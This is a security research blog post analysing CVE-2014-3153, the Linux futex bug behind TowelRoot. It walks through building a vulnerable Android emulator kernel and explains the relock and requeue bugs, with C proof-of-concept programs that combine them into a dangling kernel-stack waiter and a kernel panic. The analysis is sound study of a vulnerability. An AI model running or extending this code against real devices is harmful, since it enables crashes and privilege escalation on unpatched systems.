The Futex Vulnerability

Posted by Dany Zatuchna

Sep 11, 2014 4:12:00 AM

Here at Nativeflow, we take mobile security seriously. Naturally, the news of a new rooting mechanism aroused our curiosity and concern.

Our first instinct was to search the web for any additional information about this exploit and the vulnerability behind it. However, the scarcity of publicly available resources prompted us to perform our own analysis of the vulnerability and the exploit, and to try to distill some elements which could be used to boost the security level we provide in our solutions. The results of this analysis, we decided, ought to be shared with the public.

Due to the complexity of the vulnerability and exploit, and the level of detail we set for ourselves as a goal, this report will be divided into several posts, beginning with the vulnerability and the bugs which made it possible.

[Image: android-rooted]

A brief history

On May 26th, 2014, comex reported a potential bug in the Linux kernel futex mechanism. Later, after the bug was verified and logged as CVE-2014-3153, geohot managed to leverage this vulnerability into a full-blown privilege escalation, which he packaged as an Android application and dubbed TowelRoot. TowelRoot essentially allowed one to root devices which up until then were unrootable, such as the Samsung S5.

Vulnerability

The vulnerability is based on two logical bugs in the Linux kernel futex mechanism: one which allows releasing a pi-lock from userspace, and another which allows requeuing a lock twice.

For those unfamiliar with it, futex stands for Fast Userspace muTEX; I suggest reading about it on Wikipedia and here.
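
All the userspace snippets below call futex through thin wrappers from a helper header (futaux.h, available in our github repository). As a rough sketch of what such wrappers might look like, built directly on the raw futex(2) syscall interface (the bodies here are my own illustration, not necessarily the repository code):

#include <linux/futex.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

/* Raw futex(2) entry point; glibc provides no wrapper for it. */
static int futex(int *uaddr, int op, int val, void *timeout,
                 int *uaddr2, int val3)
{
    return syscall(SYS_futex, uaddr, op, val, timeout, uaddr2, val3);
}

/* FUTEX_LOCK_PI: acquire the pi-lock at uaddr, blocking if it is held. */
static int futex_lock_pi(int *uaddr)
{
    return futex(uaddr, FUTEX_LOCK_PI, 0, NULL, NULL, 0);
}

/* FUTEX_WAIT_REQUEUE_PI: wait on uaddr (expected to hold 0) until
 * requeued onto the pi-futex at uaddr2. */
static int futex_wait_requeue_pi(int *uaddr, int *uaddr2)
{
    return futex(uaddr, FUTEX_WAIT_REQUEUE_PI, 0, NULL, uaddr2, 0);
}

/* FUTEX_CMP_REQUEUE_PI: wake/requeue waiters from uaddr onto uaddr2,
 * provided *uaddr still equals val3; the nr_requeue count (1 here)
 * travels in the timeout argument slot. */
static int futex_requeue_pi(int *uaddr, int *uaddr2, int val3)
{
    return futex(uaddr, FUTEX_CMP_REQUEUE_PI, 1, (void *)1, uaddr2, val3);
}

/* gettid(2) also lacks a glibc wrapper on older systems. */
static pid_t gettid(void)
{
    return syscall(SYS_gettid);
}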

For the purpose of recreating and testing the vulnerability, I set up an Android emulator. The following section discusses setting up an emulator for kernel debugging; if you already know how to do that, or are only interested in the analysis, you may skip ahead to the "Relock bug" section.

One more thing before starting: I'll be heavily referencing functions (by name) from the kernel, so you should have the source files for the futex (futex.c, futex.h) and rtmutex (rtmutex.c, rtmutex_common.h) modules at hand.

Setting up the environment

Required software:

  1. Android Studio. We'll need this for the Android emulator and other supporting tools.
    Since I am using Linux as my setup, I will be picking the Linux package.
    After downloading the package, unpack it to your $ANDROID_HOME directory. You should then add it to your $PATH environment variable:
    $ export PATH=${PATH}:${ANDROID_HOME}/android-studio/sdk/tools
    $ export LD_LIBRARY_PATH=${ANDROID_HOME}/android-studio/sdk/tools/lib
  2. Git SCM. Android's sources are hosted in git repositories.
  3. Cross-compilation toolchain:
    $ cd $ANDROID_HOME
    $ git clone https://android.googlesource.com/platform/prebuilt
    $ export PATH=${PATH}:${ANDROID_HOME}/prebuilt/linux-x86/toolchain/arm-eabi-4.4.3/bin

Compiling the Android kernel

The official guide to compiling the Android kernel is https://source.android.com/source/building-kernels.html; the following is based on that guide, with some minor modifications:

  1. First, fetch a copy of the goldfish kernel source (according to the guide, this is the kernel suitable for emulated environments):
    $ cd $ANDROID_HOME
    $ git clone https://android.googlesource.com/kernel/goldfish.git
  2. We will be interested in version 3.4 of the kernel:
    $ cd ${ANDROID_HOME}/goldfish
    $ git checkout -t origin/android-goldfish-3.4 -b goldfish-3.4
  3. We also want to undo the fixes applied to the futex module. A quick glance at the history of kernel/futex.c will reveal that the last revision before the fixes following CVE-2014-3153 is e8c92d268b8b8feb550ca8d24a92c1c98ed65ace:
    $ cd ${ANDROID_HOME}/goldfish
    $ git checkout e8c92d268b8b8feb550ca8d24a92c1c98ed65ace kernel/futex.c
  4. We are now ready to start compiling the kernel. First we need to generate the build configuration:
    $ cd ${ANDROID_HOME}/goldfish
    $ make ARCH=arm SUBARCH=arm goldfish_armv7_defconfig
  5. Before we continue, we want to enable debug symbols. In ${ANDROID_HOME}/goldfish/.config, set the CONFIG_DEBUG_INFO parameter to y (or use the one-liner shown after this list).
  6. And we're ready to make:
    $ cd ${ANDROID_HOME}/goldfish
    $ make ARCH=arm SUBARCH=arm CROSS_COMPILE=${ANDROID_HOME}/prebuilt/linux-x86/toolchain/arm-eabi-4.4.3/bin/arm-eabi-
    ...
    Compile the kernel with debug info (DEBUG_INFO) [Y/n/?] y
       Reduce debugging information (DEBUG_INFO_REDUCED) [N/y/?] (NEW) N
    ...
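
As an aside, if you'd rather not edit .config by hand, a one-liner along these lines does the same thing (assuming the option starts out unset, as it does in a fresh goldfish_armv7_defconfig):

$ cd ${ANDROID_HOME}/goldfish
$ sed -i 's/# CONFIG_DEBUG_INFO is not set/CONFIG_DEBUG_INFO=y/' .config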

Running the emulator

First we need to set up a machine:

$ android create avd --name debug --target android-19
Auto-selecting single ABI armeabi-v7a
Android 4.4.2 is a basic Android platform.
Do you wish to create a custom hardware profile [no]
Created AVD 'debug' based on Android 4.4.2, ARM (armeabi-v7a) processor,
with the following hardware config:
hw.lcd.density=240
hw.ramSize=512
vm.heapSize=48

And we're ready to run:

$ emulator-arm -verbose -debug init -show-kernel -kernel arch/arm/boot/zImage -avd debug -no-boot-anim -no-skin -no-audio -no-window -qemu -gdb tcp::1234

Here's a breakdown of all the switches:

$ emulator-arm                     \
>     -verbose                     \
>     -debug init                  \ # Enable debug messages
>     -show-kernel                 \ # Show kernel messages
>     -kernel arch/arm/boot/zImage \ # Path to the image of the kernel we just compiled
>     -avd debug                   \ # Use the Android virtual device named "debug"
>     -no-boot-anim                \ # We don't want-
>     -no-skin                     \ # the emulated machine-
>     -no-audio                    \ # to have any sort-
>     -no-window                   \ # of GUI
>     -qemu -gdb tcp::1234           # Notify qemu to set up a gdbserver on localhost:1234

We can now fire up gdb from another terminal, and attach to the gdbserver:

$ cd ${ANDROID_HOME}/goldfish
$ gdb vmlinux
...
Reading symbols from vmlinux...done.
(gdb) target remote :1234
Remote debugging using :1234
warning: Architecture rejected target-supplied description
0xc000dcc4 in sys_call_table () at arch/arm/kernel/entry-common.S:494
494             b       ret_slow_syscall
(gdb)

And we're ready to start working.
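
As a quick sanity check that the symbols resolved, you can set a breakpoint on one of the functions we'll be examining (the address and line number below are placeholders, not output from a real session):

(gdb) break futex_requeue
Breakpoint 1 at 0xc00...: file kernel/futex.c, line ...
(gdb) continue
Continuing.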

Relock bug

The core of futex_lock_pi is futex_lock_pi_atomic, which attempts to acquire the lock at uaddr by an atomic cmpxchg of the contents of uaddr against the tid of the calling thread. This (roughly) translates to:

if (*uaddr == 0) {
     *uaddr = tid; /* Lock acquired */
}

If the lock was acquired, the system call returns and the thread holds the lock. If not, then the system call blocks and waits for the lock to be released:

static int futex_lock_pi_atomic(u32 __user *uaddr, struct futex_hash_bucket *hb,
                 union futex_key *key,
                 struct futex_pi_state **ps,
                 struct task_struct *task, int set_waiters)
{
...
     /* Attempt a cmpxchg */
     if (unlikely(cmpxchg_futex_value_locked(&curval, uaddr, 0, newval)))
         return -EFAULT;
...
     /* Check that the cmpxchg succeeded in a 0->TID transition */
     if (unlikely(!curval))
         return 1;
...
}

The interesting point about the lock acquisition is that its only requirement is that the cmpxchg succeed; this is completely decoupled from the acquisition state the kernel tracks for the futex associated with that address. This means that a futex lock can be released by simply loading the lock's (userspace) address with 0.

This is more readily understood with an example. Consider the following test program (apologies in advance for the excessive verbosity):

#include <stdio.h>
#include <unistd.h>
#include <pthread.h>

#include "futaux.h"

int mutex = 0;

void *thread(void *arg)
{
    int ret = 0;
    pid_t tid = gettid();
    printf("Entering thread[%d]\n", tid);
    ret = futex_lock_pi(&mutex);
    if (ret) {
        perror("Thread could not acquire lock\n");
        goto Wait_forever;
    }
    printf("Mutex acquired (mutex = %d)\n", mutex);
Wait_forever:
    printf("Exiting thread[%d]\n", tid);
    while (1) {
        sleep(1);
    }
}

int main(int argc, char *argv[])
{
    pthread_t t;
    printf("pid = %d\n", getpid());
    printf("mutex = %d\n", mutex);
    printf("Acquiring lock\n");
    if (futex_lock_pi(&mutex)) {
        perror("Lock error");
        return -1;
    }
    printf("Mutex acquired (mutex = %d)\n", mutex);
    if (argc > 1) {
        printf("Releasing lock\n");
        mutex = 0;
        printf("mutex = %d\n", mutex);
    }
    if (pthread_create(&t, NULL, thread, NULL)) {
        perror("Could not create thread");
        return -1;
    }
    while (1) {
        sleep(1);
    }
    return 0;
}

The output when running this on the emulator is:

$ adb shell /data/relock
pid = 394
mutex = 0
Acquiring lock
Mutex acquired (mutex = 394)
Entering thread[396]
^C

Now the same execution but with a manual release of the lock after it is acquired, and before the thread is spawned:

$ adb shell /data/relock a
pid = 453
mutex = 0
Acquiring lock
Mutex acquired (mutex = 453)
Releasing lock
mutex = 0
Entering thread[459]
Mutex acquired (mutex = 459)
Exiting thread[459]
^C

I'd like to add just a few words about why this is a bug. The entire purpose of the futex module is to manage the locking, releasing, and contention of locks on behalf of the user. The cmpxchg is performed as a sort of optimization in order to grab a lock quickly; however, this does not absolve the kernel of managing the internal state of the lock. You may examine the fix for this bug yourself to better understand what I mean.

Requeue bug

The syscall futex_wait_requeue_pi basically means "take the lock uaddr1 and wait for uaddr2 to become available; once it is, take it and release uaddr1".

This call must be paired with futex_requeue. While futex_wait_requeue_pi just sets up the queued waiter, futex_requeue does the heavy lifting: it adds that waiter to the various waiting lists and takes care of waking it up.

For example, a normal usage would be:

/* Locks */
int lock1 = 0, lock2 = 0;

void thread_a(void *arg)
{
...
    int ret = futex_wait_requeue_pi(&lock1, &lock2);
    /* The system call will now block and wait for some other thread to acquire
     * lock2 on its behalf and wake it up */
...
}

void thread_b(void *arg)
{
...
    int ret = futex_requeue(&lock1, &lock2, lock1);
    /* The kernel will now try to acquire lock2 for thread_a. On success, it will
     * wake up the kernel thread, while on failure it will add a waiter object to a
     * list of waiters waiting on lock2, and let the rtmutex module handle the wakeup */
...
}

From the above description, it's clear that each futex_wait_requeue_pi is meant to be paired with a single futex_requeue call, and there are measures implemented to prevent further calls with the same parameters.

To be more precise, if we call futex_wait_requeue_pi(&lock1, &lock2) and then futex_requeue(&lock1, &lock2, lock1), we cannot issue another futex_requeue(&lock1, &lock2, lock1), as it will return an error.

However, if we instead follow the first requeue with a futex_requeue(&lock2, &lock2, lock2), the code will not kick us out of the system call.
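
In other words, using the wrapper sketch from earlier (futex_requeue in the text corresponds to the futex_requeue_pi wrapper; return-value checks omitted):

/* thread-2: queue a waiter on lock1, to be requeued onto lock2 */
futex_wait_requeue_pi(&lock1, &lock2);

/* thread-1: */
futex_requeue_pi(&lock1, &lock2, lock1); /* first requeue: accepted */
futex_requeue_pi(&lock1, &lock2, lock1); /* same requeue again: rejected with an error */
futex_requeue_pi(&lock2, &lock2, lock2); /* the requeue bug: not rejected */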

Combining the bugs

It's important to understand that there are two ways a sleeping futex_wait_requeue_pi can be woken, and the two are (apparently) mutually exclusive:

  1. The lock was acquired during futex_proxy_trylock_atomic, in which case the sleeper is awoken and futex_requeue will return. End of story.
  2. The lock was acquired at the bottom of futex_requeue (during the plist_for_each_entry_safe loop) by rt_mutex_start_proxy_lock. Again, end of story.
    By the way, if rt_mutex_start_proxy_lock fails to acquire the lock immediately, it will just add a waiter to the list.

However, note that I emphasized the "apparently" in the previous sentence. As it turns out, the relock and requeue bugs together allow us to both add a waiter and wake up the sleeping kernel thread (while the waiter is still in the list).

Consider the following usage which takes advantage of both bugs:

[Diagram: requeue]

  1. (thread-1) futex_lock_pi(&B)
    This will make thread-1 acquire B, so that the next call will block.
  2. (thread-2) futex_wait_requeue_pi(&A, &B)
    Since B is owned (by thread-1), this call will set up the futex_q object with a pointer to a temporary rt_waiter object on the kernel's stack (that's Chekhov's gun right there).
  3. (thread-1) futex_requeue(&A, &B)
    This will try to acquire B on behalf of thread-2 (the top waiter), fail, and proceed to add the rt_waiter object of the futex_q associated with the requeue to the list of waiters on B.
    This is a rough outline of the code flow in futex_requeue:
    static int futex_requeue(u32 __user *uaddr1, unsigned int flags,
                  u32 __user *uaddr2, int nr_wake, int nr_requeue,
                  u32 *cmpval, int requeue_pi)
    {
    ...
        if (requeue_pi && (task_count - nr_wake < nr_requeue)) {
            /* Branch taken */
            ret = futex_proxy_trylock_atomic(uaddr2, hb1, hb2, &key1,
                    &key2, &pi_state, nr_requeue);
            /* The call will return 0 (the lock is occupied) */
    ...
            switch (ret) {
            case 0:
                /* End of this clause */
                break;
    ...
            }
        }

        head1 = &hb1->chain;
        plist_for_each_entry_safe(this, next, head1, list) {
    ...
            /* requeue_pi == 1 */
            if (requeue_pi) {
                atomic_inc(&pi_state->refcount);
                this->pi_state = pi_state;
                ret = rt_mutex_start_proxy_lock(&pi_state->pi_mutex,
                                this->rt_waiter,
                                this->task, 1);
                /* This call will return 0, as the lock was not taken,
                 * so the rt_waiter in futex_wait_requeue_pi's stack frame
                 * has been added to the list of waiters on the lock */
    ...
            }
    ...
        }
    ...
    }
  4. (thread-1) Set B to 0.
    This releases B (the relock bug).
  5. (thread-1) futex_requeue(&B, &B)
    The requeue bug allows us to issue this call and survive long enough in the system call to reach futex_proxy_trylock_atomic, which will, again, attempt to acquire B, this time on behalf of thread-2 (now the top waiter on B). The call will succeed, as the lock is apparently free, and as a side effect the kernel thread of thread-2 is woken.
    This time, the flow through futex_requeue is:
    static int futex_requeue(u32 __user *uaddr1, unsigned int flags,
                  u32 __user *uaddr2, int nr_wake, int nr_requeue,
                  u32 *cmpval, int requeue_pi)
    {
    ...
        if (requeue_pi && (task_count - nr_wake < nr_requeue)) {
            /* Branch taken */
            ret = futex_proxy_trylock_atomic(uaddr2, hb1, hb2, &key1,
                    &key2, &pi_state, nr_requeue);
            /* The call will return 1 (the lock is free), and as a side
             * effect, the sleeping thread has been woken up */
    ...
            switch (ret) {
    ...
            default:
                goto out_unlock;
    ...
            }
        }
    out_unlock:
    ...
    }
  6. (thread-2) When the kernel thread is woken up, it checks the reason for the wake-up and performs the appropriate cleanup. However, because the normal flow was interfered with, the execution flow upon waking is:
    static inline
    void requeue_pi_wake_futex(struct futex_q *q, union futex_key *key,
                    struct futex_hash_bucket *hb)
    {
    ...
        q->rt_waiter = NULL;
    ...
        wake_up_state(q->task, TASK_NORMAL);
    }

    static int futex_wait_requeue_pi(u32 __user *uaddr, unsigned int flags,
                      u32 val, ktime_t *abs_time, u32 bitset,
                      u32 __user *uaddr2)
    {
        struct rt_mutex_waiter rt_waiter;
    ...
        q.rt_waiter = &rt_waiter;
    ...
        /* This is where the kernel thread goes to sleep */
        ret = handle_early_requeue_pi_wakeup(hb, &q, &key2, to);
    ...
        /* When the thread is woken up via requeue_pi_wake_futex,
         * q->rt_waiter is NULL, so the following branch is taken */
        if (!q.rt_waiter) {
    ...
        } else {
    ...
            /* This is the branch NOT TAKEN, which would normally remove
             * rt_waiter from the waiter list */
            ret = rt_mutex_finish_proxy_lock(pi_mutex, to, &rt_waiter, 1);
    ...
        }
    ...
    }

The side effect of all this is that an rt_waiter object which resides on the stack of futex_wait_requeue_pi has been added to a linked list (by rt_mutex_start_proxy_lock in futex_requeue), and futex_wait_requeue_pi has returned without removing that waiter (which rt_mutex_finish_proxy_lock would normally do).

We now have a linked list in which one of the nodes resides on the kernel stack, outside any active stack frame. Any system call executed after futex_wait_requeue_pi returns will overrun that node, corrupting the list.

However, if we arrange for the right system call, with the right values, to run after futex_wait_requeue_pi returns, we can control that list to our advantage.

Here is an implementation of the bug combination:

#include <stdio.h>
#include <unistd.h>
#include <pthread.h>

#include "futaux.h"
#include "userlock.h"

int A = 0, B = 0;

volatile int invoke_futex_wait_requeue_pi = 0;
volatile pid_t thread_tid = -1;

void *thread(void *arg)
{
    thread_tid = gettid();
    printf("[2]\n");
    userlock_wait(&invoke_futex_wait_requeue_pi);
    futex_wait_requeue_pi(&A, &B);
    printf("Someone woke me up\n");
    while (1) {
        sleep(1);
    }
}

int main(int argc, char *argv[])
{
    pthread_t t;
    int context_switch_count = 0;

    printf("[1]\n");

    futex_lock_pi(&B);

    userlock_lock(&invoke_futex_wait_requeue_pi);
    pthread_create(&t, NULL, thread, NULL);
    /* Wait for the thread to be in a system call */
    while (thread_tid < 0) {
        usleep(10);
    }
    context_switch_count = get_voluntary_ctxt_switches(thread_tid);
    userlock_release(&invoke_futex_wait_requeue_pi);
    wait_for_thread_to_wait_in_kernel(thread_tid, context_switch_count);

    printf("[3]\n");
    futex_requeue_pi(&A, &B, A);

    printf("[4]\n");
    B = 0;

    printf("[5]\n");
    futex_requeue_pi(&B, &B, B);

    while (1) {
        sleep(1);
    }
    return 0;
}

Notice I've added infinite sleeps at the end of all the threads. Their purpose becomes apparent as soon as we terminate the program. From the shell which runs the emulator, we can see we caused a kernel panic:

kernel BUG at kernel/rtmutex_common.h:74!
Internal error: Oops - BUG: 0 [#1] PREEMPT ARM
CPU: 0    Not tainted  (3.4.67-gd3ffcc7-dirty #8)
PC is at rt_mutex_slowunlock+0x54/0x130
LR is at rt_mutex_slowunlock+0x40/0x130
pc : [<c037bec0>]    lr : [<c037beac>]    psr: 20000093
sp : de2cdde0  ip : 00000017  fp : 00000001
r10: de0d3620  r9 : 00000014  r8 : de2b7b9c
r7 : de258608  r6 : de2cde40  r5 : 20000013  r4 : de2cc000
r3 : de2cc000  r2 : 00000002  r1 : 00000000  r0 : de2cde4c
Flags: nzCv  IRQs off  FIQs on  Mode SVC_32  ISA ARM  Segment user
Control: 10c53c7d  Table: 1e2c8059  DAC: 00000015
....

Examining the code:

/* rtmutex_common.h */
static inline struct rt_mutex_waiter *
rt_mutex_top_waiter(struct rt_mutex *lock)
{
    struct rt_mutex_waiter *w;
    w = plist_first_entry(&lock->wait_list, struct rt_mutex_waiter,
                  list_entry);
    /* The kernel fails on the following assertion, generating an
     * illegal instruction which causes a kernel panic */
    BUG_ON(w->lock != lock);
    return w;
}

/* rtmutex.c */
static void __sched
rt_mutex_slowunlock(struct rt_mutex *lock)
{
...
    wakeup_next_waiter(lock);
...
}

static void wakeup_next_waiter(struct rt_mutex *lock)
{
    struct rt_mutex_waiter *waiter;
...
    waiter = rt_mutex_top_waiter(lock);
...
}

We can see what happened here: when the process was terminated (and with it its threads), the kernel went and released all the locks they held, waking up the waiters which contended on them. The lock still has a waiter in its list, but that waiter object lived on a thread stack which has since been cleared or reused; so, clearly, the waiter's lock pointer no longer matches the lock to which the dangling waiter belongs.

Some minor things before wrapping up. First, as you may have noticed, I've used some custom headers in the code snippets. These mainly contain convenience functions, such as syscall wrappers (with a reduced number of parameters) and auxiliary functions that help with syncing the various threads. All of this may be found in our github repository.
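
For reference, here is a minimal sketch of what the userlock.h helpers might look like. The names match the snippets above, but the bodies are my reconstruction, not necessarily the code in the repository:

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* A crude userspace gate: armed by clearing the flag, released by setting it. */
void userlock_lock(volatile int *lock)    { *lock = 0; }
void userlock_release(volatile int *lock) { *lock = 1; }
void userlock_wait(volatile int *lock)
{
    while (!*lock)
        usleep(10);
}

/* Read voluntary_ctxt_switches from /proc/<tid>/status. */
int get_voluntary_ctxt_switches(pid_t tid)
{
    char path[64], line[128];
    int count = -1;
    FILE *f;

    snprintf(path, sizeof(path), "/proc/%d/status", tid);
    f = fopen(path, "r");
    if (!f)
        return -1;
    while (fgets(line, sizeof(line), f)) {
        if (sscanf(line, "voluntary_ctxt_switches: %d", &count) == 1)
            break;
    }
    fclose(f);
    return count;
}

/* The thread has blocked inside a system call once its voluntary
 * context-switch count rises above the previously sampled value. */
void wait_for_thread_to_wait_in_kernel(pid_t tid, int prev_count)
{
    while (get_voluntary_ctxt_switches(tid) <= prev_count)
        usleep(10);
}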

Next time we'll see how we can leverage both bugs in order to achieve a limited form of user-to-kernel read/write.
